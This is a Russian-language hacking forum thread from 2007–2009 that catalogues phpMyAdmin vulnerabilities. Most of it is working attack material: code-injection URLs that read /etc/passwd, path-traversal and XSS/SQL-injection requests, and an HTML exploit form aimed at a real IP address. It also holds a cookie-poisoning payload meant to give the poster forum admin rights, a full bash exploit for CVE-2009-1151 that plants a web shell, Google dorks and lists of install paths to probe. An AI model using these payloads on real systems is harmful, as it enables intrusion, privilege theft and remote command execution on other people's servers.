Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   [ Обзор уязвимостей phpMyAdmin ] (https://forum.antichat.xyz/showthread.php?t=50669)

ettee 07.10.2007 02:31
[ Обзор уязвимостей phpMyAdmin ]
 
Vulnerability


2.2.0rc3
http://victim/phpmyadmin/tbl_copy.php?db=test&table=haxor&new_name=test.hax or2&strCopyTableOK=".passthru('cat%20/etc/passwd')."
Эксплоит дает выполнение произвольного кода.

2.3.2
http://target.com/phpMyAdmin/tbl_properties_structure.php?lang=<SQL INJECTION>
SQL-injection

2.5.*
phpMyAdmin 2.5.7 Remote code injection Exploit
Эксплоит дает выполнение произвольного кода.

2.5.5-pl1 and prior
http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
Эксплоит дает чтение файла / выполнение произвольного кода.

2.6.4-pl1
phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit
Эксплоит дает чтение любого фала.

HTML-Exploit:
Код HTML:
<CENTER>
<A HREF="http://www.securityreason.com><IMG
SRC="http://securityreason.com/gfx/small_logo.png"></A><P>
<FORM action="http://74.69.111.236:4681/phpmyadmin/libraries/grab_globals.lib.php" method=post enctype="multipart/form-data">
<input TYPE="hidden" name="usesubform[1]" value="1">
<input TYPE="hidden" name="usesubform[2]" value="1">
<input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p>
<input TYPE="hidden" name="subform[1][cXIb8O3]" value="1">
<input TYPE="submit" value="Exploit">
</FORM>

2.7.0
http://victim/phpmyadmin/server_privileges.php?server=1&checkprivs='
http://victim/phpmyadmin/server_privileges.php?server=1&hostname='&username =1&dbname=1&tablename=1
SQL-injection


2.11.2
SQL-injection + XSS
Код:
12 ноября, 2007
Программа: phpMyAdmin 2.11.2, возможно более ранние версии

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметре "db" в сценарии db_create.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Для успешной эксплуатации уязвимости атакующий должен иметь привилегии CREATE DATABASE и браузер жертвы должен выполнять JavaScript код в теге img (например, Opera).

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре "db" в сценарии db_create.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Для успешной эксплуатации уязвимости атакующий должен иметь привилегии CREATE DATABASE.

other:
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00
http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00
http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No



XSS (Cross-site Scripting) :

2.6.0-pl2 and prior
http://[target]/[phpMyAdmin_directory]/main.php?"><script>alert(document.cookie)</script></
http://[target]/[phpMyAdmin_directory]/read_dump .php?sql_query=set%20@1=1&zero_rows=<script>alert( document.cookie)</script>

prior to 2.6.2-rc1
http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lan g=en-iso-8859-1&convcharset=\"><sc ript>alert(document.cookie)</script>
http://[target]/phpmyadmin/index.php?pma_username=&pma_password=&server=1&lan g=en-iso-8859-1&convcharset=\"><h1>XSS</h1>

2.8.0.1
http://example.com/?convcharset=%22%20STYLE=%22background-image:%20url(javascript:alert('XSS'))%22%20r=%22
index.php?set_theme=%3Cscript%3Ealert('Powered By Expaethitec');%3C/script%3E

2.9.x
http://site.com/phpmyadmin/sql.php?db=information_schema&
token=your_token&goto=db_details_structure.php&tab le=CHARACTER_SETS&pos=[xss]


other:
Код:
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&show_server_left=MyToMy&strServer=[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&cfg[BgcolorOne]=777777%22%3E%3CH1%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/select_server.lib.php?cfg[Servers][cXIb8O3]=toja&cfg[Servers][sp3x]=toty&strServerChoice=%3CH1%3EXSS
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&bgcolor=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/libraries/display_tbl_links.lib.php?doWriteModifyAt=left&del_url=Smutno&is_display[del_lnk]=Mi&row_no=%22%3E[XSS%20code]
http://www.example.com/phpMyAdmin/themes/original/css/theme_left.css.php?num_dbs=0&left_font_family=[XSS]
http://www.example.com/phpMyAdmin/themes/original/css/theme_right.css.php?right_font_family=[XSS]
/phpmyadmin/db_create.php?token=your_token&reload=1&db=[double xss(2 followed xss)]
/phpmyadmin/db_operations.php?db_collation=latin1_swedish_ci&db_copy=true&db=prout&token=your_token&newname=[xss]
/phpmyadmin/querywindow.php?token=your_token&db=&table=&query_history_latest=[xss]&query_history_latest_db=[xss]&querydisplay_tab=[xss]

Full path disclosure :
/scripts/check_lang.php
/themes/darkblue_orange/layout.inc.php
/index.php?lang[]=
/index.php?target[]=
/index.php?db[]=
/index.php?goto[]=
/left.php?server[]=
/index.php?table[]=
/server_databases.php?token=your_token&sort_by="
/index.php?db=information_schema&token=your_token&t bl_group[]=
/db_printview.php?db="
/sql.php?back[]=
libraries/string.lib.php
libraries/storage_engines.lib.php
libraries/sqlparser.lib.php
libraries/sql_query_form.lib.php
libraries/select_theme.lib.php
libraries/select_lang.lib.php
libraries/relation_cleanup.lib.php
libraries/left_header.inc.php
libraries/import.lib.php
libraries/header_meta_style.inc.php
libraries/grab_globals.lib.php
libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&ed it_url=foo)
libraries/display_import.lib.php
libraries/display_export.lib.php
libraries/display_create_table.lib.php
libraries/display_create_database.lib.php
libraries/db_table_exists.lib.php
libraries/database_interface.lib.php
libraries/common.lib.php
libraries/check_user_privileges.lib.php
libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
libraries/import/sql.php
libraries/fpdf/ufpdf.php
libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)


dork:
Код:
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
intitle:"index of/phpmyadmin"
phpMyAdmin "running on" inurl:"main.php"
phpMyAdmin dumps
"phpMyAdmin" "running on" inurl:"main.php"
filetype:txt | filetype:sql ("phpMyAdmin SQL Dump"|"phpMyAdmin MySQL-Dump")
intitle:"index of /phpmyadmin" -tar
allinurl:/tbl_properties_structure.php?
inurl:main.php "Welcome to phpMyadmin" -"No Privileges" +"runtime" -"as root@"
http://www.google.com/search?hl=en&amp;lr=&amp;c2coff=1&amp;q=intext:"welcome to phpmyadmin" -login -"no privileges" "Create new database [Documentation]" inurl:phpmyadmin -demo

Files locations
Код:
/phpm/
/phpmy/
/phpmyadmin/
/PMA/
/mysql/
/admin/
/db/
/dbadmin/
/web/phpMyAdmin/
/admin/pma/
/admin/phpmyadmin/
/admin/mysql/
/phpmyadmin2/
/mysqladmin/
/mysql-admin/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/myadmin/
/phpMyA/
/phpmyad/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmi/
/phpMyAdmin1/
/phpMyAdmin2/
/phpMyAdmin-2/
/phpMyAdmin-2.10.0/
/phpMyAdmin-2.3.0/
/phpMyAdmin-2.3.1/
/phpMyAdmin-2.3.2/
/phpMyAdmin-2.3.3/
/phpMyAdmin-2.3.4/
/phpMyAdmin-2.3.5/
/phpMyAdmin-2.3.6/
/phpMyAdmin-2.3.7/
/phpMyAdmin-2.3.8/
/phpMyAdmin-2.3.9/
/phpMyAdmin-2.4.0/
/phpMyAdmin-2.4.1/
/phpMyAdmin-2.4.2/
/phpMyAdmin-2.4.3/
/phpMyAdmin-2.4.4/
/phpMyAdmin-2.4.5/
/phpMyAdmin-2.4.6/
/phpMyAdmin-2.4.7/
/phpMyAdmin-2.4.8/
/phpMyAdmin-2.4.9/
/phpMyAdmin-2.5.0/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.2/
/phpMyAdmin-2.5.3/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.8/
/phpMyAdmin-2.5.9/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.6.5/
/phpMyAdmin-2.6.6/
/phpMyAdmin-2.6.7/
/phpMyAdmin-2.6.8/
/phpMyAdmin-2.6.9/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.7.1/
/phpMyAdmin-2.7.2/
/phpMyAdmin-2.7.3/
/phpMyAdmin-2.7.4/
/phpMyAdmin-2.7.5/
/phpMyAdmin-2.7.6/
/phpMyAdmin-2.7.7/
/phpMyAdmin-2.7.8/
/phpMyAdmin-2.7.9/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/phpMyAdmin-2.8.3/
/phpMyAdmin-2.8.4/
/phpMyAdmin-2.8.5/
/phpMyAdmin-2.8.6/
/phpMyAdmin-2.8.7/
/phpMyAdmin-2.8.8/
/phpMyAdmin-2.8.9/
/phpMyAdmin-2.9.1/
/phpMyAdmin-2.9.2/
/phpMyAdmin-3/
/phpMyAdmin-4/
/phpMyAds/
/phpmyad-sys/

phpMyAdmin security announcement

+toxa+ 07.03.2008 03:49
SQL injection (Delayed Cross Site Request Forgery) <=v2.11.5
 
Цитата:
Announcement-ID: PMASA-2008-1
Date: 2008-03-01
Updated: 2008-03-03

Summary:
SQL injection vulnerability (Delayed Cross Site Request Forgery)

Description:
We received an advisory from Richard Cunningham, and we wish to thank him for his work. phpMyAdmin used the $_REQUEST superglobal as a source for its parameters, instead of $_GET and $_POST. This means that on most servers, a cookie with the same name as one of phpMyAdmin's parameters can interfere.
Another application could set a cookie for the root path "/" with a "sql_query" name, therefore overriding the user-submitted sql_query because by default, the $_REQUEST superglobal imports first GET, then POST then COOKIE data.

Severity:
We consider this vulnerability to be serious.

Mitigation factor:
An attacker must trick the victim into visiting a page on the same web server where he has placed code that creates a malicious cookie.

Affected versions:
Versions before 2.11.5.

Solution:
Upgrade to phpMyAdmin 2.11.5 or newer, where $_REQUEST is rebuilt to not contain cookies.

заметка на офф. сайте.
Пример использования:
У нас имеется сайт на котором стоит phpmyadmin (кстати не особо важно даже где, главное чтоб стоял и админ в него заходил), форум (для примера ipb) и скрипт подверженный активной xss (для примера возьмём теоретическую активку в пм ipb). Отправляем админу кодес с xss (важно знать префикс используемый на форуме).
Кодес:
PHP код:
<script>
document.cookie="sql_query=update ibf_members set mgroup=4 where id=31337; path=/; expires=Mon, 01-Jan-2009 00:00:00 GMT";
</script
ibf_ - префикс форума
4 - админская группа
31337 - наш id на форуме

После "заражения" xss'кой админа остаётся только ждать когда он зайдёт в phpmyadmin. Там уже выполняемый админом sql запрос перепишется и сделает нас админом форума (при данном значении параметра sql_query). Для беспалевности можно "поиграть" с параметром expires.

PS на данный момент уязвимости подвержены практически все пхпмайадмины (не успели обновиться, бгг))

Scipio 16.03.2008 11:42
еще пару XSS, в версии 2.6.1 работают, последние версии не уязвимы:
Код:
http://site/phpMyAdmin/index.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>
Код:
http://site/phpMyAdmin/calendar.php?GLOBALS[cfg][PmaAbsoluteUri]="><script>alert(5555)</script>
и т.д.
register globals и magic qoutes неважны

Код:
http://localhost/Tools/phpMyAdmin/mult_submits.inc.php?submit_mult=1&what=1&strDoYouReally=<script>alert(5555)</script>
register_globals on

поидее и в последних версиях этот скрипт уязвим, но он перенесен в libraries и немного изменен, в 2.11.5 эксплуатируется так:
Код:
http://localhost/Tools/phpMyAdmin/libraries/mult_submits.inc.php?submit_mult=1&what="><script>alert(5555)</script>
но помоему в последних версиях по умолчанию доступ к скрипту запрещен, с помощью .htaccess

+toxa+ 16.03.2008 17:05
It is a variable that was not cleaned in a way, allowing you to inject SQL code into the cookie. Here is a example of a small vulnerable php script.
PHP код:
<?php
$user['id'] = $_COOKIE['uid'];
$query "SELECT name, password FROM members where uid='" $user['id'] . "'";
$query mysql_query($query);
$name mysql_result($query0);
echo 'Hello ' $name '!';
?>
If it is a normal user, it would display a perfectly good name like "Hello Admin!".
You can now use a thing such the extention for firefox called Cookie Editor, and modify the cookie, you can also do this with javascript.
You then edit the cookie's value, it would have been something like "12", but after editing and adding sql code to it, it would be something like "-1 UNION ALL SELECT USER(), NULL FROM mysql.user--".
That will change the query, and display the user connected to the database, instead of the name of the user stored in the database.
That will result in the following being echo'd; "Hello root@localhost".

(c) h4cky0u

~!DoK_tOR!~ 20.09.2008 03:37
Vulnerable:

Код:
Typo3 phpMyAdmin 3.2
Typo3 phpMyAdmin 3.0.1
Typo3 phpMyAdmin 3.0
Typo3 phpMyAdmin 0.2.2
Turbolinux Appliance Server 3.0 x64
Turbolinux Appliance Server 3.0
phpMyAdmin phpMyAdmin 2.11.9
phpMyAdmin phpMyAdmin 2.11.8
phpMyAdmin phpMyAdmin 2.11.7
phpMyAdmin phpMyAdmin 2.11.5 1
phpMyAdmin phpMyAdmin 2.11.5
phpMyAdmin phpMyAdmin 2.11.4
phpMyAdmin phpMyAdmin 2.11.1
phpMyAdmin phpMyAdmin 2.9.1
phpMyAdmin phpMyAdmin 2.9.2-rc1
phpMyAdmin phpMyAdmin 2.9.1.1
phpMyAdmin phpMyAdmin 2.11.8.1
phpMyAdmin phpMyAdmin 2.11.5.2
phpMyAdmin phpMyAdmin 2.11.2.2
phpMyAdmin phpMyAdmin 2.11.2.1
phpMyAdmin phpMyAdmin 2.11.1.2
phpMyAdmin phpMyAdmin 2.11.1.1
phpMyAdmin phpMyAdmin 2.10.0.2
phpMyAdmin phpMyAdmin 2.10.0.1
phpMyAdmin phpMyAdmin 2.10.0.1
Exploit:

Код:
http://www.example.com/server_databases.php?pos=0&amp;dbstats=0&amp;sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&amp;sort_order=desc&amp;token=[valid token]
Выполнение произвольного PHP-кода на сервере, включая вызов внешних команд через PHP-функцию exec().

Решение:

Upgrade to phpMyAdmin 2.11.9.1 or newer.

Not Vulnerable:

Код:
Typo3 phpMyAdmin 3.3
phpMyAdmin phpMyAdmin 2.11.9 .1
www.phpmyadmin.net

ZAMUT 02.10.2008 00:15
бага разобрана тут

+StArT+ 05.10.2008 19:02
Цитата:
Сообщение от ZAMUT
бага разобрана тут
Также можно добавить: бага работает с версии [ phpMyAdmin 2.9.0-beta1 => ]

swt1 09.12.2008 02:03
phpMyAdmin 3.1.0 (XSRF) SQL Injection Vulnerability
______________________
http://www.milw0rm.com/exploits/7382

baltazar 24.12.2008 21:31
2.10.0.2
 
XSS
[CODE]
Код:
http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]
Код:
http://[server]/main.php?reload=1&message=aa&sql_query=[XSS]&token=[SID]
Код:
http://[server]/server_privileges.php?token=[SID]&username=[XSS]
Код:
http://[server]/server_privileges.php?token=[SID]&username=[XSS]
Код:
http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]
Код:
http://[server]/sql.php?db=information_schema&token=[SID]&goto=db_structure.php&table=KEY_COLUMN_USAGE&pos=[XSS]
Код:
http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`
Код:
http://[server]/sql.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30[XSS]&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`
Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]
Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4[XSS]
Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true
Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=[XSS]&unlim_num_rows=4&single_table=true
Код:
http://[server]/tbl_export.php?db=boutique&table=categories&token=[SID]&pos=0[XSS]&session_max_rows=30&
disp_direction=horizontal&repeat_cells=100&printview=1&sql_query=SELECT+*+FROM+`categories`&unlim_num_rows=4&
single_table=true
Оригинал: http://downloads.securityfocus.com/vulnerabilities/exploits/25268.html

tmp 08.02.2009 22:28
Цитата:
Сообщение от +StArT+
Также можно добавить: бага работает с версии [ phpMyAdmin 2.9.0-beta1 => ]
:) Еще бы добавил:
Работает на мускуле 4
На 5 - не работает.
По крайней мере у меня.
ТОлько что протестил.) (хорошо что там где надо стоит 4))))

ph1l1ster 16.03.2009 02:12
Код:
calendar.php?GLOBALS
иожно узнать точную версию, если > 3.*

omel 11.06.2009 01:18
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
 
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
Код:
#!/bin/bash

# CVE-2009-1151: phpMyAdmin '/scripts/setup.php' PHP Code Injection RCE PoC v0.11
# by pagvac (gnucitizen.org), 4th June 2009.
# special thanks to Greg Ose (labs.neohapsis.com) for discovering such a cool vuln,
# and to str0ke (milw0rm.com) for testing this PoC script and providing feedback!

# PoC script successfully tested on the following targets:
# phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1
# Linux 2.6.24-24-generic i686 GNU/Linux (Ubuntu 8.04.2)

# attack requirements:
# 1) vulnerable version (obviously!): 2.11.x before 2.11.9.5
# and 3.x before 3.1.3.1 according to PMASA-2009-3
# 2) it *seems* this vuln can only be exploited against environments
# where the administrator has chosen to install phpMyAdmin following
# the *wizard* method, rather than manual method: http://snipurl.com/jhjxx
# 3) administrator must have NOT deleted the '/config/' directory
# within the '/phpMyAdmin/' directory. this is because this directory is
# where '/scripts/setup.php' tries to create 'config.inc.php' which is where
# our evil PHP code is injected 8)

# more info on:
# http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
# http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

if [[ $# -ne 1 ]]
then
        echo "usage: ./$(basename $0) <phpMyAdmin_base_URL>"
        echo "i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/"
        exit
fi

if ! which curl >/dev/null
then
        echo "sorry but you need curl for this script to work!"
              echo "on Debian/Ubuntu: sudo apt-get install curl"
              exit
fi


function exploit {

postdata="token=$1&action=save&configuration="\
"a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]="\
"%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:"\
"%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:"\
"%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:"\
"%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

postdata2="token=$1&action=save&configuration=a:1:"\
"{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d="\
"%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3b"\
"system(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}"\
"if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval"\
"(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//"\
"%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22"\
"mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:"\
"%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config"\
"%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix"

        flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"
       
        echo "[+] attempting to inject phpinfo() ..."
        curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.php" >/dev/null

        if curl -ks --url "$3/config/config.inc.php" | grep "phpinfo()" >/dev/null
        then
                curl -ks --url "$3/config/config.inc.php" >$flag       
                echo "[+] success! phpinfo() injected successfully! output saved on $flag"
                curl -ks -b $2 -d $postdata2 --url "$3/scripts/setup.php" >/dev/null
                echo "[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:"
                echo "    $3/config/config.inc.php?c=ls+-l+/"
                echo "    $3/config/config.inc.php?p=phpinfo();"
                echo "    please send any feedback/improvements for this script to"\
                "unknown.pentester<AT_sign__here>gmail.com"
        else
                echo "[+] no luck injecting to $3/config/config.inc.php :("
                exit
        fi
}
# end of exploit function

cookiejar="/tmp/$(basename $0).$RANDOM.txt"
token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \"token\" | head -n 1 | cut -d \" -f 12`
echo "[+] checking if phpMyAdmin exists on URL provided ..."

#if grep phpMyAdmin $cookiejar 2>/dev/null > /dev/null
if grep phpMyAdmin $cookiejar &>/dev/null
then
        length=`echo -n $token | wc -c`

        # valid form token obtained?
        if [[ $length -eq 32 ]]
        then
                echo "[+] phpMyAdmin cookie and form token received successfully. Good!"
                # attempt exploit!
                exploit $token $cookiejar $1
        else
                echo "[+] could not grab form token. you might want to try exploiting the vuln manually :("
                exit
        fi
else
        echo "[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?"
        exit
fi

# milw0rm.com [2009-06-09]

ettee 14.06.2009 04:11
CVE-2009-1151 (phpmyadminrcesh.txt) PMASA-2009-3 PMASA-2009-4

Код:
<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com>
 * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
 * Date: Tue, 09 Jun 2009 14:13:34 GMT
 */

/* Servers configuration */
$i = 0;

/* Server  (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';

/* End of servers configuration */

?>
phpMyAdmin//config/config.inc.php?c=ls+-l+/
phpMyAdmin//config/config.inc.php?p=phpinfo();

Vulnerable software and versions:
phpmyadmin:3.1.3
phpmyadmin:3.1.3:rc1
phpmyadmin:3.1.2
phpmyadmin:3.1.2:rc1
phpmyadmin:3.1.1
phpmyadmin:3.1.1:rc1
phpmyadmin:3.1.0
phpmyadmin:2.11.9.3
phpmyadmin:2.11.9.4
phpmyadmin:2.11.9.2
phpmyadmin:2.11.9.1
phpmyadmin:2.11.9.0
phpmyadmin:2.11.9
phpmyadmin:2.11.8
phpmyadmin:2.11.7.12.11.7.1
phpmyadmin:2.11.7.0
phpmyadmin:2.11.7
phpmyadmin:2.11.6:rc1
phpmyadmin:2.11.6.0
phpmyadmin:2.11.6
phpmyadmin:2.11.5:rc1
phpmyadmin:2.11.5.2
phpmyadmin:2.11.5.1
phpmyadmin:2.11.5.0
phpmyadmin:2.11.5
phpmyadmin:2.11.4:rc1
phpmyadmin:2.11.4
phpmyadmin:2.11.3:rc1
phpmyadmin:2.11.3.0
phpmyadmin:2.11.3
phpmyadmin:2.11.2.2
phpmyadmin:2.11.2.1
phpmyadmin:2.11.2.0
phpmyadmin:2.11.2
phpmyadmin:2.11.1:rc1
phpmyadmin:2.11.1.2
phpmyadmin:2.11.1.1
phpmyadmin:2.11.1.0
phpmyadmin:2.11.1
phpmyadmin:2.11.0:rc1
phpmyadmin:2.11.0:beta1
phpmyadmin:2.11.0

Spyder 02.07.2009 21:16
По поводу full path disclosure
В последних версиях в корне пма есть файл phpinfo.php с соответствующем контентом и как правило админы его не удаляют

ettee 08.07.2009 19:49
Files locations
Код:
/php-my-admin/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.1-rc1/
/sqlmanager/
/mysqlmanager/
/p/m/a/
/PMA2005/
/pma2005/
/phpmanager/
/php-myadmin/
/phpmy-admin/
/webadmin/
/sqlweb/
/websql/
/webdb/

(Dm) 14.07.2009 01:28
По поводу уязвимости phpMyAdmin (/scripts/setup.php) PHP Code Injection добавлю что phpMyAdmin 2.8.x также уязвима.
Проверял на phpMyAdmin 2.8.0.3 Главное чтобы права на запись были (

ZAMUT 27.07.2009 18:30
Цитата:
Сообщение от Spyder
По поводу full path disclosure
В последних версиях в корне пма есть файл phpinfo.php с соответствующем контентом и как правило админы его не удаляют
libraries/config.default.php
PHP код:
$cfg['ShowPhpInfo'] = false
Все зависит от настроек. по дефолту выключено.

oRb 22.08.2009 14:28
phpMyAdmin SQL bookmark HTML Injection Vulnerability
Код:
Bugtraq ID:        35543
Class:        Input Validation Error
CVE:                CVE-2009-2284
Remote:        Yes
Local:        No
Published:        Jun 30 2009 12:00AM
Updated:        Aug 21 2009 03:57PM
Credit:        Sven Vetsch
Vulnerable:        RedHat Fedora 9 0
                RedHat Fedora 11
                RedHat Fedora 10
                phpMyAdmin phpMyAdmin 3.1.1 1
                phpMyAdmin phpMyAdmin 3.1.1 0
                phpMyAdmin phpMyAdmin 3.1 0
                phpMyAdmin phpMyAdmin 3.0.1
                phpMyAdmin phpMyAdmin 3.0
                phpMyAdmin phpMyAdmin 3.2.0-rc1
                phpMyAdmin phpMyAdmin 3.1.3.2
                phpMyAdmin phpMyAdmin 3.1.3.1
                phpMyAdmin phpMyAdmin 3.0.1.1
                MandrakeSoft Enterprise Server 5 x86_64
                MandrakeSoft Enterprise Server 5
Эксплойта или более конкретного описания в инете не нашел. Покопался сам:
Код:
/sql.php?db=test&token=849967e893f3ea2c0205f71270269616&sql_query=SELECT+%3Cscript%3Ealert()%3C/script%3E

speles 27.10.2009 15:18
как узнать точную версию phpMyAdmin

Xcontrol212 16.12.2009 21:49
Раскрытие путей
phpMyAdmin 2.6.1

Код:
http://localhost/Tools/phpMyAdmin/server_variables.php?lang=ru-win1251&server=1&collation_connection='
Код:
